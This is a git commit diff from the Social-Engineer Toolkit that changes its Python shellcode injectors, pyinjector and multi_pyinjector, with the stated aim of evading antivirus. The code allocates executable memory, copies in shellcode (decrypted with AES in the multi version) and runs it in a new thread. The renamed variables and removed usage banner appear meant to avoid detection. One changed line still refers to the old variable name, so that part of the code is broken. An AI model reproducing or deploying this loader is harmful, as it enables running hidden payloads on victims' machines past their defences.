Added new binaries to evade AV to pyinjector and multipyinjector

2024-11-28 07:20:25 +00:00 · 2013-06-18 03:46:20 -04:00 · 2013-06-18 03:46:20 -04:00 · e1e4fe1e5e
commit e1e4fe1e5e
parent 8b1213c9e1
4 changed files with 20 additions and 23 deletions
--- a/src/payloads/set_payloads/multi_pyinjector.binary
+++ b/src/payloads/set_payloads/multi_pyinjector.binary
--- a/src/payloads/set_payloads/multi_pyinjector.py
+++ b/src/payloads/set_payloads/multi_pyinjector.py
@ -1,6 +1,6 @@
 #
 # The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
-# Version: 0.2
+# Version: 0.3
 # 
 # This will spawn only a seperate thread per each shellcode instance.
 #
@ -18,19 +18,19 @@ from Crypto.Cipher import AES
 import multiprocessing

 # define our shellcode injection code through ctypes
-def inject(shellcode):
-    shellcode = shellcode.decode("string_escape")
-    shellcode = bytearray(shellcode)
+def injection(sc):
+    sc = sc.decode("string_escape")
+    sc = bytearray(sc)
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
-                                              ctypes.c_int(len(shellcode)),
+                                              ctypes.c_int(len(sc)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
-                                       ctypes.c_int(len(shellcode)))
-    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
+                                       ctypes.c_int(len(sc)))
+    buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
-                                         ctypes.c_int(len(shellcode)))
+                                         ctypes.c_int(len(sc)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
@ -50,7 +50,7 @@ if __name__ == '__main__':
            payload_filename = sys.argv[1]
            if os.path.isfile(payload_filename):
                fileopen = file(payload_filename, "r")
-                shellcode = fileopen.read()
+                sc = fileopen.read()
            # if we didn't file our shellcode path then exit out
            if not os.path.isfile(payload_filename):
                sys.exit()
@ -70,17 +70,17 @@ if __name__ == '__main__':
            DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
            cipher = AES.new(secret)
            # our decrypted value for shellcode
-            shellcode = DecryptAES(cipher, shellcode)
+            sc = DecryptAES(cipher, sc)
            # split our shellcode into a list
-            shellcode = shellcode.split(",")
+            sc = sc.split(",")
        
    # except an indexerror and allow it to continue forward
    except IndexError:
        sys.exit()
    
    jobs = []
-    for payload in shellcode:
+    for payload in sc:
        if payload != "":
-            p = multiprocessing.Process(target=inject, args=(payload,))
+            p = multiprocessing.Process(target=injection, args=(payload,))
            jobs.append(p)
            p.start()
--- a/src/payloads/set_payloads/pyinjector.binary
+++ b/src/payloads/set_payloads/pyinjector.binary
--- a/src/payloads/set_payloads/pyinjector_args.py
+++ b/src/payloads/set_payloads/pyinjector_args.py
@ -9,38 +9,35 @@ import sys

 # see if we specified shellcode
 try:
-    shellcode = sys.argv[1]
+    sc = sys.argv[1]

 # if we didn't specify a param
 except IndexError:
-    print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec"
-    print "Example: pyinjector.exe \\x41\\x41\\x41\\x41"
-    print "Usage: pyinjector.exe <shellcode>"
    sys.exit()

 # need to code the input into the right format through string escape
-shellcode = shellcode.decode("string_escape")
+sc = sc.decode("string_escape")

 # convert to bytearray
-shellcode = bytearray(shellcode)
+sc = bytearray(sc)

 # use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
-                                          ctypes.c_int(len(shellcode)),
+                                          ctypes.c_int(len(sc)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

 # use virtuallock to lock region for physical address space
 ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
-                                   ctypes.c_int(len(shellcode)))
+                                   ctypes.c_int(len(sc)))

 # read in the buffer
-buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
+buf = (ctypes.c_char * len(sc)).from_buffer(sc)

 #  moved the memory in 4 byte blocks
 ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
-                                     ctypes.c_int(len(shellcode)))
+                                     ctypes.c_int(len(sc)))
 # launch in a thread 
 ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),